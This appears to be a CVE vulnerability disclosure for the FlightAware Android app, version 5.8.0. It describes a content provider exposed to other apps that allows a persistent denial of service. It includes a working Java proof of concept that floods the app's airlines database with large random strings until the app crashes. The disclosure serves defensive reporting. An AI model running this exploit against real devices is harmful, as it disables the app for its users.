Vendor: FlightAware(https://flightaware.com/)
Affected product: FlightAware(com.flightaware.android.liveFlightTracker)
Version: 5.8.0
Download link: https://play.google.com/store/apps/details?id=com.flightaware.android.liveFlightTracker
Description of the vulnerability for use in the CVE:An issue found in FlightAware v.5.8.0 allows unauthorized apps to cause a persistent denial of service by manipulating the database files.
Additional information: The FlightAware application allows unauthorized applications to modify the data in its database files through the interface provided by the exposed component, which is loaded into memory for use at application startup. Once an attacker injects an excessive amount of data, it triggers an OOM error and crashes.
poc:
public void attack_flightware() {
ContentResolver contentResolver = getApplicationContext().getContentResolver();
Uri uri = Uri.parse("content://com.flightaware.android.liveFlightTracker.FlightAwareContent/airlines");
while (true) {
ContentValues contentValues = new ContentValues();
contentValues.put("url", getRandomString(10240));
contentValues.put("name_zh", getRandomString(10240));
contentValues.put("iata", getRandomString(10240));
contentValues.put("icao", getRandomString(10240));
contentResolver.insert(uri, contentValues);
}
}